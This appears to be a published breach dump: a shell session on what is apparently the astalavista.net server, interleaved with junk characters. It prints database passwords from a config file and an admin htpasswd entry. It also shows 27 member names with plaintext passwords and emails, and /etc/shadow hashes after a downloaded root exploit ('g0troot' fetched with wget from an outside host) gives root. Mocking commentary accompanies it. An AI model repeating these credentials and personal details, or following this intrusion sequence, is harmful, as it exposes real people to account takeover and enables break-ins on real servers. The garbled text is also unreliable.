# |. d+ O7 O: r. w$ ^4 H3 ]9 @, Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
. f& j7 ]) Q" X6 M, @* o& bdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..# C( f2 R3 P1 U! R
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 _007
- |) f) \ t/ Ydrwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql
$ S8 {& G/ M/ [; n/ z& Wdrwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
, A s3 }* ]: o; {) Y& p/ \drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend8 w2 A* Q; Q3 G4 i7 t7 ~
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner. O: y" R2 h& A
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg1 S: n0 l5 v7 ~' m7 }
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config! t8 v/ f4 r6 s' P
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron* I' Q. O q) |: ~" ]9 C; v0 N
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd( p3 f5 v+ O' h
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
' O; b6 H3 Q) Q/ |-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
8 Q0 x2 v* |- T" @4 C7 Udrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed, U; g3 R3 p( [
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour0 q# X! n1 H8 l+ F0 l
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess' V: l3 f2 t- I
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess
+ Q; a" b! }5 y7 X& {-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php9 V' F$ J: Y& Y v: d. m7 m: f
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
! L& D% y4 ?! W! k-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
]( ]6 b( k) r1 l2 @-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php+ w; {9 l& N$ A! X! k7 X$ S
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
! m" ^# b; h- v% G3 F; Bdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc+ K6 S( o2 f" ~: _9 m1 B
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
1 @8 F5 Y/ \) R! W0 g, `% Xdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib9 h. G" X( ~% K& b0 Q2 p
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log P1 N, K, d h8 w* Q
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member/ z1 I$ ? [+ R. k% ^1 s; `
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata8 H$ V+ e% g6 D* r# r
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new0 C i' A) p2 M9 y2 J
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
1 t* C- d4 J% x2 D: [2 M$ Ldrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
; l$ _) a# u: P& h$ u$ R/ H- M' J-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
( k6 Y: K1 W3 q6 G! l7 pdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
: M, R) R3 r% k3 Y* j# X# Odrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources5 [) i0 z' a* Y4 K3 v8 m: b
drwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
+ [8 V& Z+ u8 ~8 {9 C2 f) }1 C. v) A' Odrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes: W: R3 B, Y5 I4 r, S+ ^( N9 d
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src# }4 u5 ~6 g7 n/ w4 Q
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl& v- e9 {; ?# z; v! H! N. ~* W
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
1 ~9 l: L9 E( {- N% Y* a) Idrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
2 p5 e" @ a/ p8 V* P& c+ W-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
o- \& ], i' R( M7 j6 a' jdrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki6 n- @$ ?+ G3 [ M
4 }$ }8 k5 v! U$ S% C; Csh-3.2$ head -20 index.php
4 p* Y( J& f1 o7 w4 }% n+ e( t<?PHP5 U7 K) d' K3 s G
/**
% g; F& u. E y: s: d4 k* Mainfile (external) for astalavistaNET v2.0
+ @ I' ?* ]( y6 X*
8 {! K- H0 u- w6 {4 i. l; u* @copyright Astalavista IT Engineering GmbH
3 s" b; h. g& e* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
2 A" Y, Z3 e6 V* @version 1.0( p+ d* y& I; K3 ]2 o7 q0 G
*/ m' f: y) ?5 P; x; k2 a) u3 }
8 R5 R3 |' c( H2 C) J9 C. ~
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {8 `# m- s( l0 f0 p* R2 i4 X
$dontStartSession = false;
* t3 o9 U4 Q& c } else {
+ I0 J: e0 [! i* X" ~+ B( O $dontStartSession = true;% N; u+ F7 H! U/ X* k2 U2 M
}
' D, x& q& D( }" @; A8 P require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
0 e; V( L' e3 | x$ |, o4 t W require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);2 g! O' L/ h$ Q, x" `; o4 T
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
0 S9 c V. |8 J' U9 g require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);7 W/ @0 P% _1 A2 t8 @5 w
( ~' N. w- l) `* Z: }( X2 ^, Ush-3.2$ cd config
1 _6 n L6 }) q# j5 ~' ssh-3.2$ ls -la
# q; x4 {8 O- x' `; i: W" U, ftotal 32# y4 I& Q1 O* M, T
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
. X) ]8 J$ f8 A P) _" _drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
* P! t0 o& i6 g8 A3 {0 \-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php9 ^8 h& |" S! f! W$ c
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php
5 y4 N) b; ^' b8 e+ k% o2 T; u-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
\ W* R6 C$ d# W. Y1 F$ {! W% _-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
2 g4 h# n; Z) X; |+ `* v' b-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
* U& D9 B+ f) y4 v7 ] h5 o# Y
! c2 d! Q! x& u0 o7 ish-3.2$ cat com.conf.php
& T, O* H# w# {! V) e+ O2 P+ R[snip]+ [2 O8 H% c/ S" R' ^ }& _
//member-database% i# ]! ~* x: l5 E
$_CONFIG['db_mem_server'] = ‘localhost’;
3 P$ @4 B- j7 g- R: ~5 M6 m: n$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;: G9 o2 E" D# R \6 F( c( ^, H5 x5 B
$_CONFIG['db_mem_user'] = ‘astanet_db’;0 [7 O& m% d' b
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
3 s) y ^7 P4 X8 A @2 ]$_CONFIG['db_mem_debug'] = false; //true or false
: l' T7 D: K7 F- g/ T( U2 D//ads-database* ?1 `) u6 F4 b. l7 H5 ~, |5 f3 _
$_CONFIG['db_ads_server'] = ‘localhost’;9 l. v \1 \: Q' H& V5 n+ P
$_CONFIG['db_ads_database'] = ‘astanet_ads’;: `- D( F7 w- T4 F$ ^$ F
$_CONFIG['db_ads_user'] = ‘astanet_db’;5 ]9 P7 y, [8 {
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
, r, o; [# A3 t$_CONFIG['db_ads_debug'] = false; //true or false7 |1 y$ D9 `, F3 F7 C2 y0 U8 q/ I7 w
//rainbow-database
" Q, w! Q- |4 B) l, y* {! q$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
! f: C% b; o# V: Z( p2 o6 [* W8 g$_CONFIG['db_rainbow_database'] = ‘rainbow’;
, `! V9 [& S( A& p$_CONFIG['db_rainbow_user'] = ‘dinu’;
5 I! u) f: ]- i m, Z$_CONFIG['db_rainbow_password'] = ‘dinudinu’;2 v" w( K% h7 }- M- V4 r; n
$_CONFIG['db_rainbow_debug'] = false; //true or false
3 u/ c: d% e. N/ J4 I//mailing lists database! f, {( b- v* `) x0 y( g
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;4 z2 v5 _( Q1 M) D
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
2 v0 H7 p# M! j- s: V% b$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
/ q. Y" g6 l% K( m, U! O$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
e1 t5 V6 M2 Z8 A1 _% H% R& X$_CONFIG['db_mailing_lists_debug'] = false; //true or false1 I& [2 T B1 ^3 t6 }3 H0 A/ X
//paypal, ^$ Y5 ~; ]. E7 R
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
; u |9 B+ g. P! W: H6 M# M+ p$_CONFIG['sub_pp_cmd'] = ‘_xclick’;4 o! ?' }; K% ?# L: J g8 R
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
6 P, I9 ?+ R5 `7 d5 s: I$ ~$_CONFIG['sub_pp_noship'] = ‘1′;
. G# e7 N3 b# \- P$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;- c/ V+ e& @, x. p. B
[snip]* T, A+ r+ X ^ i7 b C. [% u$ t, {
8 b% Y. Y% w4 Qsh-3.2$ cd ..6 L e7 @9 C/ {! f) @
sh-3.2$ cd member0 _+ h7 Y8 k. e+ h! T
sh-3.2$ ls -la9 ]3 Z9 F5 m) ]3 Y% V# b. m
total 20
0 G! o3 Z6 g/ Rdrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .1 |4 J+ j/ {" K2 ?( [
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 T* U0 \) Y" j1 l
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess8 C6 l4 F6 k# m# j7 \! J
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php; k0 g9 z6 b2 u1 b& D6 [# d; J
sh-3.2$ cat .htaccess
& T% m# [& s+ XSecFilterEngine off
# @* b, ~# c# x
1 K! Y9 u2 p0 W# j% O, Tsh-3.2$ cd .." f; t1 W0 b' t# \, |- d! J
sh-3.2$ cd cron
: M) g* w# g, _( [& jsh-3.2$ ls -la' B9 l$ P: L; n# r1 J# E/ ^' K
total 1683 H+ ~7 T& Q* ]" E
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
, z, l3 @- y! D, b: D0 Hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
. l' f% f7 V2 t-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
* L B7 k: h* G-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php- u- a- s- h$ t8 e8 H
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php. |+ K: @- n2 @- O) O
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php3 {' _- \% n0 F) j9 q
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php/ j- h# n* \! b0 O6 l% d5 y
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php U+ X+ h& L0 e
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php# G$ H, f+ c& c! L6 g. q. p
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
: T2 G# a7 N: _* E' T-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
+ t& B6 w6 `0 |8 E; ~! L-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
( [6 t6 ^' P7 j& B! J3 `-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
" {; R2 m% w. }" @, L/ D `6 b-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
2 q5 i& Q2 k* H( E-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh _. |# K3 A5 K. ^; o- `
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
, q( y" E. V6 Q1 F% M: v-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
" ?, Y x B" c6 v-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php3 [0 H" d: _! X
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php/ O) S0 t1 V4 A L& [
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php( g) E2 J$ |) z) L+ n( U
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
7 D$ G0 c) }) W4 X9 }-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php; I/ b/ b& P1 D
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
$ E8 F% j; b) z2 s: P4 c/ `. g6 [4 J3 Q% R! s
sh-3.2$ cd ..( }2 R3 h8 ?+ d) Y7 ^4 _
sh-3.2$ cd _007, X. t) N5 l4 {" A3 E6 F7 _
sh-3.2$ ls -la
& `1 o9 _ K0 s' |) ktotal 246 O, J) X( E" u# Z
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
3 o" Y# l9 Z h% A/ m3 y: Ydrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
N1 q: o- I4 {# Y$ h' u8 L-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess
: y V% t" _; o1 I6 f-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
0 B( x0 a" f" u$ W4 d5 \-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
9 q6 _- ?$ ^4 n7 {- n: ]drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap {9 O u7 o8 U0 `
% d& B! ^" \1 {sh-3.2$ cat .htaccess$ g5 K0 I9 U7 s4 H5 \5 A w9 `
authType Basic
' i/ g4 e- m# }' X6 tauthName Admin9 Y8 T; Y s$ Z- J4 C; ]
authUserFile /home/astanet/auth/.htadm_pwd0 G/ R2 D4 m' U! f6 A. M
require valid-user
# K" \5 H' y. w: [1 x; v* V- f3 j+ x+ N W' E2 L+ M
sh-3.2$ cat /home/astanet/auth/.htadm_pwd% _% w/ n% ` d6 C, d! x
admin2net:CR0bl65MwhfT& |3 @; ]+ u" z# z8 A0 Y
' d& }. }( Z2 h3 J; y7 [
sh-3.2$ mysql -u astanet_db -p: W% e2 Y8 z N r3 N! X; M3 f! W
Enter password:
% C$ `& s3 H$ `Welcome to the MySQL monitor. Commands end with ; or \g., x9 b( Q/ H$ C4 S7 s
Your MySQL connection id is 275153; `6 N: v0 r1 r. x8 T
Server version: 5.0.45-community-log MySQL Community Edition (GPL)' _, D' J" a0 \
; D7 g0 G+ i4 B0 D9 M& BType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
$ V' J5 @7 X7 _; _! p" {, Z. G
mysql> show databases;! A, ]) h6 e6 D W2 }
+———————–+
o# o/ A1 ^6 ]# Z5 l9 v! C| Database |" Y8 n5 u6 d7 i! Z8 q& m
+———————–+
- [. [7 N: \4 G, Q8 A9 P| information_schema |
% A0 e2 X+ n+ l| astanet_ads |
, N$ J1 x. Y7 ~9 v| astanet_mailing_lists |
! r# D2 b4 c/ n% _| astanet_mediawiki |
$ q/ a* {' ?- q z6 B* ?7 L| astanet_membersystem |
U! r/ L- V& |) [3 P2 I| test | ?+ J% x, I3 A* }/ v( m, Q! H) B
+———————–+5 C5 H" J; i! Z4 \. Q. D
6 rows in set (0.00 sec)
+ N& [' a. J0 P2 a+ `: w
9 f- R/ Z4 |8 R* Omysql> use astanet_membersystem
& u& V2 z T1 M* }; L' Q) K* |Database changed
$ G$ m* q9 H' i3 O9 _mysql> show tables;
& q7 B, j8 T- r- J+———————————–+1 S- n' K5 U& x! ~5 K- p
| Tables_in_astanet_membersystem |
& P8 D0 F6 `- [$ a; h# p+———————————–+8 U) P$ X' s, s8 Y
| blacklist_categories |
% }# u) S4 Z) B/ h& `0 x| blacklist_content |( z% Y! c) n' [* c7 P& z9 h
| blacklist_levels |
; ]4 ?1 r4 J8 K9 F2 M| blacklist_mcset |3 m6 z* D4 M/ h7 q* L9 }8 S6 S
| dir_categories |& t3 M# g3 g0 z& _
| dir_comments |
; d! c* i5 d" p$ M5 _% S| dir_links |% Q4 |4 }& O% X6 k& O4 j4 J) F
| dir_temp |3 L3 |! Z2 U/ `
| dir_votes |- t: S, i2 G- C' e
| documents |
8 K0 W) |6 A q; c| documents_categories |
) r4 V5 @* q7 e" ?5 F5 |$ h| email_content |6 b# {7 J T4 u* [0 W$ k1 j
| email_settings |1 H$ ]( X* {- C6 g" ~* X' A3 {) a+ O
| exploits |
/ W' S+ F- L& s" D: C0 [& B| exploits_categories |
6 a3 [, p; e# Y% j! V| exploittree_categories |* N, G+ b0 V# k+ O. ^; V
| exploittree_exploits |
& r0 G/ v9 C$ \9 D, T$ L# B| home_values |- @' X: {9 S1 I* g9 q
| iso_countries |! b5 @- h/ x; U ?" M. k% G$ f
| links_categories |8 J1 N! T7 K3 r0 @
| links_records |
' y% ^4 c! |4 Y- N2 s| links_unauth |
$ d. i4 d: g8 z# E7 v& l B2 \| links_votes |3 q- L5 _: m$ B' q% R9 N' l
| log |* y. P* }9 f! N* }4 \3 s4 @& d4 Q
| news_categories |
) U, {) }. p4 a( w! V| news_comments |
/ _( @" N5 l. t. u# J| news_emoticons |- I$ \# m, B% Q% o
| news_latest |
6 G/ q5 S2 @0 T) \. a5 N1 ^6 D* d| news_messages |. k3 v- _! l5 [0 u9 D# ^
| news_statistics |
9 |( j- Z) q$ [3 |8 l* W| news_votes |! D, ^3 j) f9 f) J3 }
| prices_content |) l" g% d! @& _/ D
| prices_offers |8 G. f6 x& r- G* P# {6 v
| rss_settings |2 v- q8 X6 @3 N: {2 J
| sessions |
5 D3 ], Z5 E/ a! O& c, h0 L| stats_signups |
$ b: T. j, t7 h' W| u2u2 |4 z5 H" C' U* m) f& c' O/ }9 y
| u2u_contact |% x* T9 ~$ A2 L6 N4 U- {
| u2u_settings |
# E$ J0 U: n0 y2 J$ Q| user_keywords_selected_categories |
/ b! O% Y- G5 h/ f2 R r8 }- P| users |
6 [4 i, n% x; A* C$ K; X| users_ipn_test |
- h7 k* l/ {# ~- K% A) k$ L| users_keyword_values |
" p) b/ H( d( g' [| users_profile |4 h/ H; ^8 B+ @. p' q; Y- [
| users_temp |% Q3 @0 E, f( M" W
| users_upgrade |
# o; V4 c5 b4 c( W+———————————–+7 K5 l% o) ~3 V3 u( A$ |5 N2 B
46 rows in set (0.00 sec)
+ V, q! |9 ~2 ~$ g2 Q* S- a% E: t/ s- I: ]4 J
mysql> describe users;
) A8 ]& e5 j9 a6 W8 p, K. [+————————–+————————————–+——+—–+———————+—————-+
9 {' x$ u- U" k% Y' u5 {+ k- `| Field | Type | Null | Key | Default | Extra |
+ Z" N! Q( B) q+————————–+————————————–+——+—–+———————+—————-+& ?+ O! `5 I5 e. t
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
! }$ b$ w0 ]1 a4 ^& `' F| user | varchar(50) | NO | | | |
8 {; E1 E7 P, b% C# ?| nickname | varchar(30) | NO | MUL | anonymous | |3 Z1 u! R7 s5 x% y. s' a/ Z
| password | varchar(30) | NO | | | |
* w: p2 j$ p) k| userlevel | tinyint(3) | YES | MUL | NULL | |
6 B6 {* U" v: f4 w| exp | int(8) unsigned | NO | | 0 | |1 u/ k: a5 ]; ]% O
| email | varchar(50) | NO | | | |4 f) `# k" i8 {: s5 @2 G
| ip | varchar(15) | NO | | 0 | |5 u1 _7 G$ b3 W3 L
| proxy | set(’0′,’1′) | NO | | 0 | |' \1 B& E W0 P
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |; o1 P: k( U0 @
| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |6 b% E/ ?& n( d! \
| anz_in | tinyint(1) | NO | | -1 | |- j3 W* |! O6 C2 _9 D
| status | tinyint(1) unsigned | NO | | 0 | |: i7 G; R0 w5 `. m7 x
| checked | set(’0′,’1′,’2′) | NO | | 0 | |- N: d O$ I8 s+ @7 _0 z% K2 M, Q7 ^
| freemember | set(’0′,’1′) | NO | | 0 | |' ~7 Q9 B1 i( b# v* [; n1 B
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
+ A# [* J. t' n. I6 a4 w0 H| lang | tinytext | NO | | | |# X3 w3 k0 J8 h! d4 |4 M7 @4 M
| adid | smallint(6) | NO | | 0 | |
9 O0 B- ~' i* h, K: s| pp_txn_id | varchar(255) | YES | | NULL | |& o$ b, Y. G$ y6 W) A: Z
| cnb_transaction_id | varchar(255) | YES | | NULL | |' ?: j! k, S' Z$ J& I" q9 ?
| cnb_order_id | varchar(255) | YES | | NULL | |; Q# B' |6 \) u' l0 b3 S! z! e
| cnb_user_id | int(11) | YES | | 0 | |
2 w) E. a" h/ ~' V+ [8 n) R+————————–+————————————–+——+—–+———————+—————-++ D: T2 j) J: `
22 rows in set (0.01 sec)7 [! h+ B0 }' _& L) C' M; {2 g! d x5 J
* w: c6 i' U/ g2 a- ~$ [
mysql> select count(*) as skids from users;$ m3 o# J8 |) q! Q0 I; |
+——-+2 {$ x: L$ G* g! v- u
| skids |4 [+ n) d$ h6 u
+——-+
0 `4 s+ B; L# E n: Q1 e2 u( @' X| 25199 |
+ y2 _& @+ ~: Y D) Y+——-+
: F) N" h" v& P6 w) }" i/ r1 row in set (0.00 sec)* h8 U$ |# K& V$ z8 x
/ W' `# b6 i" W3 C8 d& x3 B; F
mysql> select user,nickname,password,email from users where userlevel = 1;
- S6 e# G: e: ?; m! |* H& k+————————–+———————-+——————+———————————–+& a$ U- p$ m9 Q1 y% ]( V
| user | nickname | password | email |
% X7 N v, h* h* y& W( p+————————–+———————-+——————+———————————–++ q( L" o, F( ?2 ], I4 }
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
9 n" u _5 [$ a. O2 s* l| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
+ }7 [7 o: M. ?. C: Y0 P" ~6 I| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
6 K( _2 Q& o2 H| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |8 G* ?! e! S+ @9 w1 B6 t j+ }
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
7 E# r; \8 G. {) n0 n! u/ [, I0 y3 V| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
- N) b8 @$ U/ `! ]0 z' P| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |6 P6 S9 c+ P* t, D( M7 e
| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
! C9 h/ ^7 C. U C| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
0 j! G" Y F2 W" q4 Z2 G. c1 \| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |) A" C7 ?3 F# n0 c6 n$ H8 | g( G* e
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |9 {6 x; ?: f9 i* t/ e, J) q
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
2 j j# b0 o! d6 N, H% P) ]| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |5 B( n# h) `1 i
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |* i; T: \# ]' D4 s0 B
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
9 W& Y. E/ j) ]. U* y7 Q% ?% J, r: t| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
3 g, j2 a3 \+ h! K- c| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |# M9 a0 D$ V2 H; f7 R
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
7 H0 A) @* l4 o! [| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |0 k! J: |' X1 w$ e1 J8 K X2 }
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
4 o0 r, |4 U# K, ]* I| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |) c: F/ `1 ]5 y8 j
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |, E; t( ~2 e$ c' {7 x! r
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |+ r) N: z5 ~# U; H& [ V9 g' M
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |3 r5 O& }) T' P% L- {& F
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |- w' f& n0 E, L& T% T
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
- I. A3 e8 g" @: m! j| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
3 ?# ~7 }+ {& X- u$ `2 R2 Z+————————–+———————-+——————+———————————–+1 y9 P k j( m" v9 a/ j3 w8 |- X
27 rows in set (0.00 sec)
. ?5 _ T! R+ J! Y3 p
" V2 N; B1 p& Pmysql> exit;
7 d' r4 H# y1 z0 b* r+ q& w8 iBye0 R1 N9 w9 g& y
. `7 N9 h6 D" Y9 K9 k4 Q& i0 Q
[~] plaintext passwords? yes,$ @8 _1 L! |! x/ N6 _+ J
Those so called “security professionals” who charge you $6.66 / month to) h3 o- h' h' E$ W
register at their hack-proof portal, save your passwords in plaintext…2 ]0 S8 E% [: s J
brilliant!5 G8 J/ Z' h( t" h; [9 }8 A
- a( y$ A! q* u( y8 O% W[~] This been fun but we want more.
1 U% b; i5 B. J U* ?& l- Z5 J$ I& o$ `6 { s8 W9 g- e
sh-3.2$ uname -a
9 g1 u4 o8 H. s+ LLinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
" f- d7 ~3 r6 h, _. Y+ A4 ssh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]4 a& n" |# r5 | A+ Q n
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]" T4 o! v3 `: d: ]/ \
Resolving anti.sec.labs… 13.33.33.37
2 O0 W6 C2 p. [& v; TConnecting to anti.sec.labs|13.33.33.37|:80… connected.+ T7 A: |$ \! X1 }- ~/ M
HTTP request sent, awaiting response… 200 OK. Q- ~6 D; A# G% W$ H/ \ H
Length: 18200 (18K) [text/plain]
2 P! c/ u$ S. k k* NSaving to: `g0troot’
. S1 v: K6 ?( M) D& E6 U2 C2 n1 K: c7 y |# c9 K2 u2 k& x
100%[=========================================================================================================================================>] 18,200 58.6K/s in# n8 w+ O- V0 l5 A) Y2 K, C
0.3s$ ?5 ^( T) P. \0 p# V1 G; n& e
# M& a2 M2 N2 { m+ j9 V* v
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]3 a+ i6 }& ]$ {$ [% h- n" m1 p
% T; r( `( S. Z! v7 o! C
sh-3.2$ ./g0troot -i x86_64; W/ e, G+ g6 I7 j Y
[+] g0troot - anti.sec.labs
# b) W6 m# x8 U5 n8 n- _[+] Target: 2.6.18-128.1.10.el5# S/ U ]# I1 s# Q v7 v
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]4 [: F0 O: `) n, c, ]1 i
4 y5 _/ N% W5 N5 b1 g5 l
[+] r00tr00t
; |: u2 { m5 Z( @. \! U2 C2 x[~] Executing shell…' i. s5 Q0 `' n; \8 q! g& }
% s8 {( ~. m! F$ J! m/ Hsh-3.2# id
1 y) ~5 X& Y- N7 r7 f5 R8 G% h ?uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
" Q1 E% ~; _8 t i
% e' o! F& ]- _$ p: Fsh-3.2# cat /etc/shadow" S1 I) y) X+ i9 u/ A5 ~' r
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
( {$ D( z! I/ A! _ ^* i: e[snip]( A3 R! [+ K1 A* l
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
